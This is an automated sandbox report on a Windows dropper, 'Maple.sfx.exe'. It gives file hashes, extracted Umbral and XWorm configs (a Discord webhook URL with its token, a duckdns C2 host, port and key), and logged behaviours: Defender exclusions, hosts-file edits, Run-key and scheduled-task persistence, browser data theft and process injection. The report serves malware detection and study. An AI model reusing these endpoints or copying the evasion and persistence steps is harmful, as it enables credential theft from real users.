Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
15-12-2024 05:37
Static task
static1
General
-
Target
Maple.sfx.exe
-
Size
49.9MB
-
MD5
b6eb7b6c81c32e94112f00a4bd7fbc80
-
SHA1
328d30384ac99a4b24ebb78fe1ccde41444191a7
-
SHA256
5db2db5c8a468b925bdf13bb3f11244af1c7dbc86a6f5727b724bf1961c5e5e2
-
SHA512
94e1d9a2899f7d2a210dc76615923be8475a8f89c9484d56f3ee2c9c28cf75a13051df8dd068835261bcab62e12a4c57bbb41efa0b7783b8b1138b314649f003
-
SSDEEP
1572864:wOyrjq1zExjMkfCfYFvWExN+ZJupU485C3Kc68:wOscE9Mkfnb1pUTC3P68
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1260642804414156891/hKfLDYiwORnJS0u7NEs9WPwqTyOYiJyHsbqndD7MezE-rhVSLHFDRhBZ_hNqb3v9ZoeE
Extracted
xworm
5.0
testarosa.duckdns.org:7110
5ZpeoOe6AtQfr6wU
-
Install_directory
%AppData%
-
install_file
Ondrive.exe
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral2/files/0x000e000000023bae-32.dat family_umbral behavioral2/memory/1492-48-0x000001C4EB100000-0x000001C4EB140000-memory.dmp family_umbral -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x0008000000023c05-61.dat family_xworm behavioral2/memory/2940-72-0x0000000000660000-0x0000000000670000-memory.dmp family_xworm -
Njrat family
-
Umbral family
-
Xworm family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3464 powershell.exe 5008 powershell.exe 2372 powershell.exe 4756 powershell.exe 3628 powershell.exe 2344 powershell.exe 968 powershell.exe 516 powershell.exe 3508 powershell.exe 864 powershell.exe 3844 powershell.exe 2104 powershell.exe 632 powershell.exe 1996 powershell.exe 1964 powershell.exe 1764 powershell.exe 4044 powershell.exe 3752 powershell.exe 816 powershell.exe 3968 powershell.exe 4304 powershell.exe 4796 powershell.exe 3676 powershell.exe 4384 powershell.exe 1144 powershell.exe 3756 powershell.exe 4636 powershell.exe 3720 powershell.exe 2992 powershell.exe 2976 powershell.exe 3008 powershell.exe 880 powershell.exe 3940 powershell.exe 4728 powershell.exe 3840 powershell.exe 2816 powershell.exe 3196 powershell.exe 4620 powershell.exe 4420 powershell.exe 2868 powershell.exe 3840 powershell.exe 4840 powershell.exe 2428 powershell.exe 2180 powershell.exe 2188 powershell.exe 3820 powershell.exe 2496 powershell.exe 4924 powershell.exe 4924 powershell.exe 2676 powershell.exe 2948 powershell.exe 1008 powershell.exe 4316 powershell.exe 3720 powershell.exe 3408 powershell.exe 4600 powershell.exe 3628 powershell.exe 2648 powershell.exe 4600 powershell.exe 3464 powershell.exe 2456 powershell.exe 1668 powershell.exe 4296 powershell.exe 628 powershell.exe -
Drops file in Drivers directory 23 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Maple.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Maple.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Maple.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Maple.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Maple.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Maple.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Maple.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Maple.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Maple.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Maple.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Maple.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Maple.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Maple.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Maple.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Maple.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Maple.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Maple.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Maple.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Maple.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Maple.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Maple.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Maple.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Maple.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 2788 netsh.exe -
Checks computer location settings 2 TTPs 64 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Server.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Maple.sfx.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Server.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Server.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Server.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation conhost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation loader.exe -
Executes dropped EXE 64 IoCs
pid Process 1772 loader.exe 2084 Server.exe 1492 Maple.exe 3076 loader.exe 2300 Server.exe 2940 conhost.exe 1332 Server.exe 3564 Server.exe 4616 conhost.exe 4148 Maple.exe 4524 loader.exe 1520 Server.exe 4420 Server.exe 2352 conhost.exe 4744 Maple.exe 4840 loader.exe 2420 server.exe 1448 Server.exe 2556 Maple.exe 1344 loader.exe 8 Server.exe 3108 Maple.exe 4656 loader.exe 1604 Server.exe 3972 Maple.exe 876 loader.exe 4804 Server.exe 2636 Maple.exe 2436 loader.exe 3012 Server.exe 312 Maple.exe 2708 loader.exe 1592 Server.exe 4144 Maple.exe 4296 loader.exe 3484 Server.exe 2388 Maple.exe 2532 loader.exe 4424 Server.exe 2968 Maple.exe 1584 loader.exe 4004 Server.exe 3564 Maple.exe 1028 loader.exe 756 Server.exe 4524 Maple.exe 4420 loader.exe 4776 Server.exe 3176 Maple.exe 2472 loader.exe 2000 Server.exe 220 Maple.exe 1592 loader.exe 3632 Server.exe 436 Ondrive.exe 4620 Maple.exe 1584 loader.exe 3528 Server.exe 2708 Maple.exe 2472 loader.exe 4988 Server.exe 3620 Maple.exe 4700 loader.exe 2396 Server.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." server.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." server.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 46 IoCs
flow ioc 146 discord.com 160 discord.com 168 discord.com 191 discord.com 198 discord.com 207 discord.com 33 discord.com 116 discord.com 226 discord.com 124 discord.com 132 discord.com 177 discord.com 192 discord.com 199 discord.com 216 discord.com 56 discord.com 90 discord.com 227 discord.com 21 discord.com 72 discord.com 123 discord.com 133 discord.com 140 discord.com 167 discord.com 81 discord.com 98 discord.com 105 discord.com 208 discord.com 45 discord.com 80 discord.com 139 discord.com 183 discord.com 73 discord.com 91 discord.com 106 discord.com 161 discord.com 184 discord.com 215 discord.com 22 discord.com 97 discord.com 55 discord.com 115 discord.com 147 discord.com 176 discord.com 32 discord.com 46 discord.com -
Looks up external IP address via web service 23 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 102 ip-api.com 109 ip-api.com 164 ip-api.com 171 ip-api.com 195 ip-api.com 204 ip-api.com 219 ip-api.com 27 ip-api.com 85 ip-api.com 94 ip-api.com 119 ip-api.com 143 ip-api.com 41 ip-api.com 127 ip-api.com 136 ip-api.com 188 ip-api.com 212 ip-api.com 14 ip-api.com 50 ip-api.com 66 ip-api.com 77 ip-api.com 153 ip-api.com 180 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 61 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Maple.sfx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 46 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4004 PING.EXE 2552 cmd.exe 4864 cmd.exe 3240 cmd.exe 2836 cmd.exe 3620 PING.EXE 4084 cmd.exe 4272 PING.EXE 1604 PING.EXE 3624 cmd.exe 3108 cmd.exe 2968 cmd.exe 3552 PING.EXE 2460 PING.EXE 4320 PING.EXE 4432 PING.EXE 4248 PING.EXE 2356 PING.EXE 4928 cmd.exe 4424 PING.EXE 4244 PING.EXE 1396 cmd.exe 2032 cmd.exe 4700 PING.EXE 4700 cmd.exe 2320 PING.EXE 3720 PING.EXE 4276 cmd.exe 2152 cmd.exe 4808 PING.EXE 3948 cmd.exe 2924 cmd.exe 1212 cmd.exe 4912 PING.EXE 2256 cmd.exe 3588 cmd.exe 1172 PING.EXE 4520 cmd.exe 2924 PING.EXE 4920 PING.EXE 4048 PING.EXE 4580 PING.EXE 180 cmd.exe 4788 cmd.exe 4540 cmd.exe 4516 PING.EXE -
Detects videocard installed 1 TTPs 23 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2948 wmic.exe 3196 wmic.exe 3768 wmic.exe 1248 wmic.exe 3008 wmic.exe 4156 wmic.exe 1764 wmic.exe 3720 wmic.exe 4856 wmic.exe 4380 wmic.exe 2948 wmic.exe 1996 wmic.exe 3464 wmic.exe 2212 wmic.exe 592 wmic.exe 4352 wmic.exe 4444 wmic.exe 3320 wmic.exe 3608 wmic.exe 4608 wmic.exe 3216 wmic.exe 4532 wmic.exe 1468 wmic.exe -
Runs ping.exe 1 TTPs 23 IoCs
pid Process 4004 PING.EXE 4580 PING.EXE 4244 PING.EXE 1172 PING.EXE 3552 PING.EXE 3620 PING.EXE 1604 PING.EXE 2356 PING.EXE 4424 PING.EXE 4516 PING.EXE 4248 PING.EXE 4272 PING.EXE 4920 PING.EXE 2320 PING.EXE 4432 PING.EXE 4808 PING.EXE 4700 PING.EXE 4912 PING.EXE 4048 PING.EXE 4320 PING.EXE 3720 PING.EXE 2460 PING.EXE 2924 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3196 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2940 conhost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1492 Maple.exe 4756 powershell.exe 4756 powershell.exe 3824 powershell.exe 3824 powershell.exe 3840 powershell.exe 3840 powershell.exe 4288 powershell.exe 4288 powershell.exe 4384 powershell.exe 4384 powershell.exe 1964 powershell.exe 1964 powershell.exe 516 powershell.exe 516 powershell.exe 3756 powershell.exe 1728 powershell.exe 3756 powershell.exe 1728 powershell.exe 2556 Maple.exe 3464 powershell.exe 3464 powershell.exe 3820 powershell.exe 3820 powershell.exe 1276 powershell.exe 1276 powershell.exe 4376 powershell.exe 4376 powershell.exe 4840 powershell.exe 4840 powershell.exe 2636 Maple.exe 2636 Maple.exe 4304 powershell.exe 4304 powershell.exe 4304 powershell.exe 2944 powershell.exe 2944 powershell.exe 2944 powershell.exe 2648 powershell.exe 2648 powershell.exe 2648 powershell.exe 4728 powershell.exe 4728 powershell.exe 4728 powershell.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 2388 Maple.exe 2388 Maple.exe 4044 powershell.exe 4044 powershell.exe 4044 powershell.exe 4600 powershell.exe 4600 powershell.exe 4600 powershell.exe 4908 powershell.exe 4908 powershell.exe 4908 powershell.exe 4408 powershell.exe 4408 powershell.exe 4408 powershell.exe 1008 powershell.exe 1008 powershell.exe 1008 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2940 conhost.exe Token: SeDebugPrivilege 1492 Maple.exe Token: SeIncreaseQuotaPrivilege 4380 wmic.exe Token: SeSecurityPrivilege 4380 wmic.exe Token: SeTakeOwnershipPrivilege 4380 wmic.exe Token: SeLoadDriverPrivilege 4380 wmic.exe Token: SeSystemProfilePrivilege 4380 wmic.exe Token: SeSystemtimePrivilege 4380 wmic.exe Token: SeProfSingleProcessPrivilege 4380 wmic.exe Token: SeIncBasePriorityPrivilege 4380 wmic.exe Token: SeCreatePagefilePrivilege 4380 wmic.exe Token: SeBackupPrivilege 4380 wmic.exe Token: SeRestorePrivilege 4380 wmic.exe Token: SeShutdownPrivilege 4380 wmic.exe Token: SeDebugPrivilege 4380 wmic.exe Token: SeSystemEnvironmentPrivilege 4380 wmic.exe Token: SeRemoteShutdownPrivilege 4380 wmic.exe Token: SeUndockPrivilege 4380 wmic.exe Token: SeManageVolumePrivilege 4380 wmic.exe Token: 33 4380 wmic.exe Token: 34 4380 wmic.exe Token: 35 4380 wmic.exe Token: 36 4380 wmic.exe Token: SeIncreaseQuotaPrivilege 4380 wmic.exe Token: SeSecurityPrivilege 4380 wmic.exe Token: SeTakeOwnershipPrivilege 4380 wmic.exe Token: SeLoadDriverPrivilege 4380 wmic.exe Token: SeSystemProfilePrivilege 4380 wmic.exe Token: SeSystemtimePrivilege 4380 wmic.exe Token: SeProfSingleProcessPrivilege 4380 wmic.exe Token: SeIncBasePriorityPrivilege 4380 wmic.exe Token: SeCreatePagefilePrivilege 4380 wmic.exe Token: SeBackupPrivilege 4380 wmic.exe Token: SeRestorePrivilege 4380 wmic.exe Token: SeShutdownPrivilege 4380 wmic.exe Token: SeDebugPrivilege 4380 wmic.exe Token: SeSystemEnvironmentPrivilege 4380 wmic.exe Token: SeRemoteShutdownPrivilege 4380 wmic.exe Token: SeUndockPrivilege 4380 wmic.exe Token: SeManageVolumePrivilege 4380 wmic.exe Token: 33 4380 wmic.exe Token: 34 4380 wmic.exe Token: 35 4380 wmic.exe Token: 36 4380 wmic.exe Token: SeDebugPrivilege 4756 powershell.exe Token: SeDebugPrivilege 3824 powershell.exe Token: SeDebugPrivilege 3840 powershell.exe Token: SeDebugPrivilege 4616 conhost.exe Token: SeDebugPrivilege 4288 powershell.exe Token: SeDebugPrivilege 4384 powershell.exe Token: SeIncreaseQuotaPrivilege 1496 wmic.exe Token: SeSecurityPrivilege 1496 wmic.exe Token: SeTakeOwnershipPrivilege 1496 wmic.exe Token: SeLoadDriverPrivilege 1496 wmic.exe Token: SeSystemProfilePrivilege 1496 wmic.exe Token: SeSystemtimePrivilege 1496 wmic.exe Token: SeProfSingleProcessPrivilege 1496 wmic.exe Token: SeIncBasePriorityPrivilege 1496 wmic.exe Token: SeCreatePagefilePrivilege 1496 wmic.exe Token: SeBackupPrivilege 1496 wmic.exe Token: SeRestorePrivilege 1496 wmic.exe Token: SeShutdownPrivilege 1496 wmic.exe Token: SeDebugPrivilege 1496 wmic.exe Token: SeSystemEnvironmentPrivilege 1496 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2992 wrote to memory of 1772 2992 Maple.sfx.exe 82 PID 2992 wrote to memory of 1772 2992 Maple.sfx.exe 82 PID 1772 wrote to memory of 2084 1772 loader.exe 84 PID 1772 wrote to memory of 2084 1772 loader.exe 84 PID 1772 wrote to memory of 1492 1772 loader.exe 85 PID 1772 wrote to memory of 1492 1772 loader.exe 85 PID 1772 wrote to memory of 3076 1772 loader.exe 86 PID 1772 wrote to memory of 3076 1772 loader.exe 86 PID 2084 wrote to memory of 2300 2084 Server.exe 87 PID 2084 wrote to memory of 2300 2084 Server.exe 87 PID 2084 wrote to memory of 2300 2084 Server.exe 87 PID 2084 wrote to memory of 2940 2084 Server.exe 88 PID 2084 wrote to memory of 2940 2084 Server.exe 88 PID 1492 wrote to memory of 4380 1492 Maple.exe 89 PID 1492 wrote to memory of 4380 1492 Maple.exe 89 PID 1492 wrote to memory of 2028 1492 Maple.exe 92 PID 1492 wrote to memory of 2028 